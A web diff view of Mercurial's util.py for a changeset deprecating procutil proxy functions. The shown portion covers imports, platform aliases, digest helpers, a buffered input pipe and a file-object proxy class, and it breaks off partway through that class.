##// END OF EJS Templates
util: deprecate procutil proxy functions (API)...
Yuya Nishihara -
r37139:24ab3381 default
parent child Browse files
Show More
@@ -1,3851 +1,3860
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import tempfile
34 import tempfile
35 import time
35 import time
36 import traceback
36 import traceback
37 import warnings
37 import warnings
38 import zlib
38 import zlib
39
39
40 from . import (
40 from . import (
41 encoding,
41 encoding,
42 error,
42 error,
43 i18n,
43 i18n,
44 node as nodemod,
44 node as nodemod,
45 policy,
45 policy,
46 pycompat,
46 pycompat,
47 urllibcompat,
47 urllibcompat,
48 )
48 )
49 from .utils import (
49 from .utils import (
50 dateutil,
50 dateutil,
51 procutil,
51 procutil,
52 stringutil,
52 stringutil,
53 )
53 )
54
54
55 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
56 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
57 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
58
58
59 b85decode = base85.b85decode
59 b85decode = base85.b85decode
60 b85encode = base85.b85encode
60 b85encode = base85.b85encode
61
61
62 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
63 empty = pycompat.empty
64 httplib = pycompat.httplib
64 httplib = pycompat.httplib
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 rename = platform.rename
115 rename = platform.rename
116 removedirs = platform.removedirs
116 removedirs = platform.removedirs
117 samedevice = platform.samedevice
117 samedevice = platform.samedevice
118 samefile = platform.samefile
118 samefile = platform.samefile
119 samestat = platform.samestat
119 samestat = platform.samestat
120 setflags = platform.setflags
120 setflags = platform.setflags
121 split = platform.split
121 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
123 statisexec = platform.statisexec
124 statislink = platform.statislink
124 statislink = platform.statislink
125 umask = platform.umask
125 umask = platform.umask
126 unlink = platform.unlink
126 unlink = platform.unlink
127 username = platform.username
127 username = platform.username
128
128
129 try:
129 try:
130 recvfds = osutil.recvfds
130 recvfds = osutil.recvfds
131 except AttributeError:
131 except AttributeError:
132 pass
132 pass
133
133
134 # Python compatibility
134 # Python compatibility
135
135
136 _notset = object()
136 _notset = object()
137
137
138 def _rapply(f, xs):
138 def _rapply(f, xs):
139 if xs is None:
139 if xs is None:
140 # assume None means non-value of optional data
140 # assume None means non-value of optional data
141 return xs
141 return xs
142 if isinstance(xs, (list, set, tuple)):
142 if isinstance(xs, (list, set, tuple)):
143 return type(xs)(_rapply(f, x) for x in xs)
143 return type(xs)(_rapply(f, x) for x in xs)
144 if isinstance(xs, dict):
144 if isinstance(xs, dict):
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 return f(xs)
146 return f(xs)
147
147
148 def rapply(f, xs):
148 def rapply(f, xs):
149 """Apply function recursively to every item preserving the data structure
149 """Apply function recursively to every item preserving the data structure
150
150
151 >>> def f(x):
151 >>> def f(x):
152 ... return 'f(%s)' % x
152 ... return 'f(%s)' % x
153 >>> rapply(f, None) is None
153 >>> rapply(f, None) is None
154 True
154 True
155 >>> rapply(f, 'a')
155 >>> rapply(f, 'a')
156 'f(a)'
156 'f(a)'
157 >>> rapply(f, {'a'}) == {'f(a)'}
157 >>> rapply(f, {'a'}) == {'f(a)'}
158 True
158 True
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161
161
162 >>> xs = [object()]
162 >>> xs = [object()]
163 >>> rapply(pycompat.identity, xs) is xs
163 >>> rapply(pycompat.identity, xs) is xs
164 True
164 True
165 """
165 """
166 if f is pycompat.identity:
166 if f is pycompat.identity:
167 # fast path mainly for py2
167 # fast path mainly for py2
168 return xs
168 return xs
169 return _rapply(f, xs)
169 return _rapply(f, xs)
170
170
171 def bitsfrom(container):
171 def bitsfrom(container):
172 bits = 0
172 bits = 0
173 for bit in container:
173 for bit in container:
174 bits |= bit
174 bits |= bit
175 return bits
175 return bits
176
176
177 # python 2.6 still have deprecation warning enabled by default. We do not want
177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
178 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
179 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 r'mercurial')
194 r'mercurial')
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 DeprecationWarning, r'mercurial')
196 DeprecationWarning, r'mercurial')
197
197
198 def nouideprecwarn(msg, version, stacklevel=1):
198 def nouideprecwarn(msg, version, stacklevel=1):
199 """Issue an python native deprecation warning
199 """Issue an python native deprecation warning
200
200
201 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
201 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
202 """
202 """
203 if _dowarn:
203 if _dowarn:
204 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
204 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 " update your code.)") % version
205 " update your code.)") % version
206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207
207
208 DIGESTS = {
208 DIGESTS = {
209 'md5': hashlib.md5,
209 'md5': hashlib.md5,
210 'sha1': hashlib.sha1,
210 'sha1': hashlib.sha1,
211 'sha512': hashlib.sha512,
211 'sha512': hashlib.sha512,
212 }
212 }
213 # List of digest types from strongest to weakest
213 # List of digest types from strongest to weakest
214 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
214 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215
215
216 for k in DIGESTS_BY_STRENGTH:
216 for k in DIGESTS_BY_STRENGTH:
217 assert k in DIGESTS
217 assert k in DIGESTS
218
218
219 class digester(object):
219 class digester(object):
220 """helper to compute digests.
220 """helper to compute digests.
221
221
222 This helper can be used to compute one or more digests given their name.
222 This helper can be used to compute one or more digests given their name.
223
223
224 >>> d = digester([b'md5', b'sha1'])
224 >>> d = digester([b'md5', b'sha1'])
225 >>> d.update(b'foo')
225 >>> d.update(b'foo')
226 >>> [k for k in sorted(d)]
226 >>> [k for k in sorted(d)]
227 ['md5', 'sha1']
227 ['md5', 'sha1']
228 >>> d[b'md5']
228 >>> d[b'md5']
229 'acbd18db4cc2f85cedef654fccc4a4d8'
229 'acbd18db4cc2f85cedef654fccc4a4d8'
230 >>> d[b'sha1']
230 >>> d[b'sha1']
231 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
231 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 >>> digester.preferred([b'md5', b'sha1'])
232 >>> digester.preferred([b'md5', b'sha1'])
233 'sha1'
233 'sha1'
234 """
234 """
235
235
236 def __init__(self, digests, s=''):
236 def __init__(self, digests, s=''):
237 self._hashes = {}
237 self._hashes = {}
238 for k in digests:
238 for k in digests:
239 if k not in DIGESTS:
239 if k not in DIGESTS:
240 raise error.Abort(_('unknown digest type: %s') % k)
240 raise error.Abort(_('unknown digest type: %s') % k)
241 self._hashes[k] = DIGESTS[k]()
241 self._hashes[k] = DIGESTS[k]()
242 if s:
242 if s:
243 self.update(s)
243 self.update(s)
244
244
245 def update(self, data):
245 def update(self, data):
246 for h in self._hashes.values():
246 for h in self._hashes.values():
247 h.update(data)
247 h.update(data)
248
248
249 def __getitem__(self, key):
249 def __getitem__(self, key):
250 if key not in DIGESTS:
250 if key not in DIGESTS:
251 raise error.Abort(_('unknown digest type: %s') % k)
251 raise error.Abort(_('unknown digest type: %s') % k)
252 return nodemod.hex(self._hashes[key].digest())
252 return nodemod.hex(self._hashes[key].digest())
253
253
254 def __iter__(self):
254 def __iter__(self):
255 return iter(self._hashes)
255 return iter(self._hashes)
256
256
257 @staticmethod
257 @staticmethod
258 def preferred(supported):
258 def preferred(supported):
259 """returns the strongest digest type in both supported and DIGESTS."""
259 """returns the strongest digest type in both supported and DIGESTS."""
260
260
261 for k in DIGESTS_BY_STRENGTH:
261 for k in DIGESTS_BY_STRENGTH:
262 if k in supported:
262 if k in supported:
263 return k
263 return k
264 return None
264 return None
265
265
266 class digestchecker(object):
266 class digestchecker(object):
267 """file handle wrapper that additionally checks content against a given
267 """file handle wrapper that additionally checks content against a given
268 size and digests.
268 size and digests.
269
269
270 d = digestchecker(fh, size, {'md5': '...'})
270 d = digestchecker(fh, size, {'md5': '...'})
271
271
272 When multiple digests are given, all of them are validated.
272 When multiple digests are given, all of them are validated.
273 """
273 """
274
274
275 def __init__(self, fh, size, digests):
275 def __init__(self, fh, size, digests):
276 self._fh = fh
276 self._fh = fh
277 self._size = size
277 self._size = size
278 self._got = 0
278 self._got = 0
279 self._digests = dict(digests)
279 self._digests = dict(digests)
280 self._digester = digester(self._digests.keys())
280 self._digester = digester(self._digests.keys())
281
281
282 def read(self, length=-1):
282 def read(self, length=-1):
283 content = self._fh.read(length)
283 content = self._fh.read(length)
284 self._digester.update(content)
284 self._digester.update(content)
285 self._got += len(content)
285 self._got += len(content)
286 return content
286 return content
287
287
288 def validate(self):
288 def validate(self):
289 if self._size != self._got:
289 if self._size != self._got:
290 raise error.Abort(_('size mismatch: expected %d, got %d') %
290 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 (self._size, self._got))
291 (self._size, self._got))
292 for k, v in self._digests.items():
292 for k, v in self._digests.items():
293 if v != self._digester[k]:
293 if v != self._digester[k]:
294 # i18n: first parameter is a digest name
294 # i18n: first parameter is a digest name
295 raise error.Abort(_('%s mismatch: expected %s, got %s') %
295 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 (k, v, self._digester[k]))
296 (k, v, self._digester[k]))
297
297
298 try:
298 try:
299 buffer = buffer
299 buffer = buffer
300 except NameError:
300 except NameError:
301 def buffer(sliceable, offset=0, length=None):
301 def buffer(sliceable, offset=0, length=None):
302 if length is not None:
302 if length is not None:
303 return memoryview(sliceable)[offset:offset + length]
303 return memoryview(sliceable)[offset:offset + length]
304 return memoryview(sliceable)[offset:]
304 return memoryview(sliceable)[offset:]
305
305
306 _chunksize = 4096
306 _chunksize = 4096
307
307
308 class bufferedinputpipe(object):
308 class bufferedinputpipe(object):
309 """a manually buffered input pipe
309 """a manually buffered input pipe
310
310
311 Python will not let us use buffered IO and lazy reading with 'polling' at
311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 the same time. We cannot probe the buffer state and select will not detect
312 the same time. We cannot probe the buffer state and select will not detect
313 that data are ready to read if they are already buffered.
313 that data are ready to read if they are already buffered.
314
314
315 This class let us work around that by implementing its own buffering
315 This class let us work around that by implementing its own buffering
316 (allowing efficient readline) while offering a way to know if the buffer is
316 (allowing efficient readline) while offering a way to know if the buffer is
317 empty from the output (allowing collaboration of the buffer with polling).
317 empty from the output (allowing collaboration of the buffer with polling).
318
318
319 This class lives in the 'util' module because it makes use of the 'os'
319 This class lives in the 'util' module because it makes use of the 'os'
320 module from the python stdlib.
320 module from the python stdlib.
321 """
321 """
322 def __new__(cls, fh):
322 def __new__(cls, fh):
323 # If we receive a fileobjectproxy, we need to use a variation of this
323 # If we receive a fileobjectproxy, we need to use a variation of this
324 # class that notifies observers about activity.
324 # class that notifies observers about activity.
325 if isinstance(fh, fileobjectproxy):
325 if isinstance(fh, fileobjectproxy):
326 cls = observedbufferedinputpipe
326 cls = observedbufferedinputpipe
327
327
328 return super(bufferedinputpipe, cls).__new__(cls)
328 return super(bufferedinputpipe, cls).__new__(cls)
329
329
330 def __init__(self, input):
330 def __init__(self, input):
331 self._input = input
331 self._input = input
332 self._buffer = []
332 self._buffer = []
333 self._eof = False
333 self._eof = False
334 self._lenbuf = 0
334 self._lenbuf = 0
335
335
336 @property
336 @property
337 def hasbuffer(self):
337 def hasbuffer(self):
338 """True is any data is currently buffered
338 """True is any data is currently buffered
339
339
340 This will be used externally a pre-step for polling IO. If there is
340 This will be used externally a pre-step for polling IO. If there is
341 already data then no polling should be set in place."""
341 already data then no polling should be set in place."""
342 return bool(self._buffer)
342 return bool(self._buffer)
343
343
344 @property
344 @property
345 def closed(self):
345 def closed(self):
346 return self._input.closed
346 return self._input.closed
347
347
348 def fileno(self):
348 def fileno(self):
349 return self._input.fileno()
349 return self._input.fileno()
350
350
351 def close(self):
351 def close(self):
352 return self._input.close()
352 return self._input.close()
353
353
354 def read(self, size):
354 def read(self, size):
355 while (not self._eof) and (self._lenbuf < size):
355 while (not self._eof) and (self._lenbuf < size):
356 self._fillbuffer()
356 self._fillbuffer()
357 return self._frombuffer(size)
357 return self._frombuffer(size)
358
358
359 def readline(self, *args, **kwargs):
359 def readline(self, *args, **kwargs):
360 if 1 < len(self._buffer):
360 if 1 < len(self._buffer):
361 # this should not happen because both read and readline end with a
361 # this should not happen because both read and readline end with a
362 # _frombuffer call that collapse it.
362 # _frombuffer call that collapse it.
363 self._buffer = [''.join(self._buffer)]
363 self._buffer = [''.join(self._buffer)]
364 self._lenbuf = len(self._buffer[0])
364 self._lenbuf = len(self._buffer[0])
365 lfi = -1
365 lfi = -1
366 if self._buffer:
366 if self._buffer:
367 lfi = self._buffer[-1].find('\n')
367 lfi = self._buffer[-1].find('\n')
368 while (not self._eof) and lfi < 0:
368 while (not self._eof) and lfi < 0:
369 self._fillbuffer()
369 self._fillbuffer()
370 if self._buffer:
370 if self._buffer:
371 lfi = self._buffer[-1].find('\n')
371 lfi = self._buffer[-1].find('\n')
372 size = lfi + 1
372 size = lfi + 1
373 if lfi < 0: # end of file
373 if lfi < 0: # end of file
374 size = self._lenbuf
374 size = self._lenbuf
375 elif 1 < len(self._buffer):
375 elif 1 < len(self._buffer):
376 # we need to take previous chunks into account
376 # we need to take previous chunks into account
377 size += self._lenbuf - len(self._buffer[-1])
377 size += self._lenbuf - len(self._buffer[-1])
378 return self._frombuffer(size)
378 return self._frombuffer(size)
379
379
380 def _frombuffer(self, size):
380 def _frombuffer(self, size):
381 """return at most 'size' data from the buffer
381 """return at most 'size' data from the buffer
382
382
383 The data are removed from the buffer."""
383 The data are removed from the buffer."""
384 if size == 0 or not self._buffer:
384 if size == 0 or not self._buffer:
385 return ''
385 return ''
386 buf = self._buffer[0]
386 buf = self._buffer[0]
387 if 1 < len(self._buffer):
387 if 1 < len(self._buffer):
388 buf = ''.join(self._buffer)
388 buf = ''.join(self._buffer)
389
389
390 data = buf[:size]
390 data = buf[:size]
391 buf = buf[len(data):]
391 buf = buf[len(data):]
392 if buf:
392 if buf:
393 self._buffer = [buf]
393 self._buffer = [buf]
394 self._lenbuf = len(buf)
394 self._lenbuf = len(buf)
395 else:
395 else:
396 self._buffer = []
396 self._buffer = []
397 self._lenbuf = 0
397 self._lenbuf = 0
398 return data
398 return data
399
399
400 def _fillbuffer(self):
400 def _fillbuffer(self):
401 """read data to the buffer"""
401 """read data to the buffer"""
402 data = os.read(self._input.fileno(), _chunksize)
402 data = os.read(self._input.fileno(), _chunksize)
403 if not data:
403 if not data:
404 self._eof = True
404 self._eof = True
405 else:
405 else:
406 self._lenbuf += len(data)
406 self._lenbuf += len(data)
407 self._buffer.append(data)
407 self._buffer.append(data)
408
408
409 return data
409 return data
410
410
411 def mmapread(fp):
411 def mmapread(fp):
412 try:
412 try:
413 fd = getattr(fp, 'fileno', lambda: fp)()
413 fd = getattr(fp, 'fileno', lambda: fp)()
414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 except ValueError:
415 except ValueError:
416 # Empty files cannot be mmapped, but mmapread should still work. Check
416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 # if the file is empty, and if so, return an empty buffer.
417 # if the file is empty, and if so, return an empty buffer.
418 if os.fstat(fd).st_size == 0:
418 if os.fstat(fd).st_size == 0:
419 return ''
419 return ''
420 raise
420 raise
421
421
422 class fileobjectproxy(object):
422 class fileobjectproxy(object):
423 """A proxy around file objects that tells a watcher when events occur.
423 """A proxy around file objects that tells a watcher when events occur.
424
424
425 This type is intended to only be used for testing purposes. Think hard
425 This type is intended to only be used for testing purposes. Think hard
426 before using it in important code.
426 before using it in important code.
427 """
427 """
428 __slots__ = (
428 __slots__ = (
429 r'_orig',
429 r'_orig',
430 r'_observer',
430 r'_observer',
431 )
431 )
432
432
433 def __init__(self, fh, observer):
433 def __init__(self, fh, observer):
434 object.__setattr__(self, r'_orig', fh)
434 object.__setattr__(self, r'_orig', fh)
435 object.__setattr__(self, r'_observer', observer)
435 object.__setattr__(self, r'_observer', observer)
436
436
437 def __getattribute__(self, name):
437 def __getattribute__(self, name):
438 ours = {
438 ours = {
439 r'_observer',
439 r'_observer',
440
440
441 # IOBase
441 # IOBase
442 r'close',
442 r'close',
443 # closed if a property
443 # closed if a property
444 r'fileno',
444 r'fileno',
445 r'flush',
445 r'flush',
446 r'isatty',
446 r'isatty',
447 r'readable',
447 r'readable',
448 r'readline',
448 r'readline',
449 r'readlines',
449 r'readlines',
450 r'seek',
450 r'seek',
451 r'seekable',
451 r'seekable',
452 r'tell',
452 r'tell',
453 r'truncate',
453 r'truncate',
454 r'writable',
454 r'writable',
455 r'writelines',
455 r'writelines',
456 # RawIOBase
456 # RawIOBase
457 r'read',
457 r'read',
458 r'readall',
458 r'readall',
459 r'readinto',
459 r'readinto',
460 r'write',
460 r'write',
461 # BufferedIOBase
461 # BufferedIOBase
462 # raw is a property
462 # raw is a property
463 r'detach',
463 r'detach',
464 # read defined above
464 # read defined above
465 r'read1',
465 r'read1',
466 # readinto defined above
466 # readinto defined above
467 # write defined above
467 # write defined above
468 }
468 }
469
469
470 # We only observe some methods.
470 # We only observe some methods.
471 if name in ours:
471 if name in ours:
472 return object.__getattribute__(self, name)
472 return object.__getattribute__(self, name)
473
473
474 return getattr(object.__getattribute__(self, r'_orig'), name)
474 return getattr(object.__getattribute__(self, r'_orig'), name)
475
475
476 def __nonzero__(self):
476 def __nonzero__(self):
477 return bool(object.__getattribute__(self, r'_orig'))
477 return bool(object.__getattribute__(self, r'_orig'))
478
478
479 __bool__ = __nonzero__
479 __bool__ = __nonzero__
480
480
481 def __delattr__(self, name):
481 def __delattr__(self, name):
482 return delattr(object.__getattribute__(self, r'_orig'), name)
482 return delattr(object.__getattribute__(self, r'_orig'), name)
483
483
484 def __setattr__(self, name, value):
484 def __setattr__(self, name, value):
485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486
486
487 def __iter__(self):
487 def __iter__(self):
488 return object.__getattribute__(self, r'_orig').__iter__()
488 return object.__getattribute__(self, r'_orig').__iter__()
489
489
490 def _observedcall(self, name, *args, **kwargs):
490 def _observedcall(self, name, *args, **kwargs):
491 # Call the original object.
491 # Call the original object.
492 orig = object.__getattribute__(self, r'_orig')
492 orig = object.__getattribute__(self, r'_orig')
493 res = getattr(orig, name)(*args, **kwargs)
493 res = getattr(orig, name)(*args, **kwargs)
494
494
495 # Call a method on the observer of the same name with arguments
495 # Call a method on the observer of the same name with arguments
496 # so it can react, log, etc.
496 # so it can react, log, etc.
497 observer = object.__getattribute__(self, r'_observer')
497 observer = object.__getattribute__(self, r'_observer')
498 fn = getattr(observer, name, None)
498 fn = getattr(observer, name, None)
499 if fn:
499 if fn:
500 fn(res, *args, **kwargs)
500 fn(res, *args, **kwargs)
501
501
502 return res
502 return res
503
503
504 def close(self, *args, **kwargs):
504 def close(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'close', *args, **kwargs)
506 r'close', *args, **kwargs)
507
507
508 def fileno(self, *args, **kwargs):
508 def fileno(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'fileno', *args, **kwargs)
510 r'fileno', *args, **kwargs)
511
511
512 def flush(self, *args, **kwargs):
512 def flush(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'flush', *args, **kwargs)
514 r'flush', *args, **kwargs)
515
515
516 def isatty(self, *args, **kwargs):
516 def isatty(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'isatty', *args, **kwargs)
518 r'isatty', *args, **kwargs)
519
519
520 def readable(self, *args, **kwargs):
520 def readable(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'readable', *args, **kwargs)
522 r'readable', *args, **kwargs)
523
523
524 def readline(self, *args, **kwargs):
524 def readline(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'readline', *args, **kwargs)
526 r'readline', *args, **kwargs)
527
527
528 def readlines(self, *args, **kwargs):
528 def readlines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'readlines', *args, **kwargs)
530 r'readlines', *args, **kwargs)
531
531
532 def seek(self, *args, **kwargs):
532 def seek(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'seek', *args, **kwargs)
534 r'seek', *args, **kwargs)
535
535
536 def seekable(self, *args, **kwargs):
536 def seekable(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'seekable', *args, **kwargs)
538 r'seekable', *args, **kwargs)
539
539
540 def tell(self, *args, **kwargs):
540 def tell(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'tell', *args, **kwargs)
542 r'tell', *args, **kwargs)
543
543
544 def truncate(self, *args, **kwargs):
544 def truncate(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'truncate', *args, **kwargs)
546 r'truncate', *args, **kwargs)
547
547
548 def writable(self, *args, **kwargs):
548 def writable(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'writable', *args, **kwargs)
550 r'writable', *args, **kwargs)
551
551
552 def writelines(self, *args, **kwargs):
552 def writelines(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'writelines', *args, **kwargs)
554 r'writelines', *args, **kwargs)
555
555
556 def read(self, *args, **kwargs):
556 def read(self, *args, **kwargs):
557 return object.__getattribute__(self, r'_observedcall')(
557 return object.__getattribute__(self, r'_observedcall')(
558 r'read', *args, **kwargs)
558 r'read', *args, **kwargs)
559
559
560 def readall(self, *args, **kwargs):
560 def readall(self, *args, **kwargs):
561 return object.__getattribute__(self, r'_observedcall')(
561 return object.__getattribute__(self, r'_observedcall')(
562 r'readall', *args, **kwargs)
562 r'readall', *args, **kwargs)
563
563
564 def readinto(self, *args, **kwargs):
564 def readinto(self, *args, **kwargs):
565 return object.__getattribute__(self, r'_observedcall')(
565 return object.__getattribute__(self, r'_observedcall')(
566 r'readinto', *args, **kwargs)
566 r'readinto', *args, **kwargs)
567
567
568 def write(self, *args, **kwargs):
568 def write(self, *args, **kwargs):
569 return object.__getattribute__(self, r'_observedcall')(
569 return object.__getattribute__(self, r'_observedcall')(
570 r'write', *args, **kwargs)
570 r'write', *args, **kwargs)
571
571
572 def detach(self, *args, **kwargs):
572 def detach(self, *args, **kwargs):
573 return object.__getattribute__(self, r'_observedcall')(
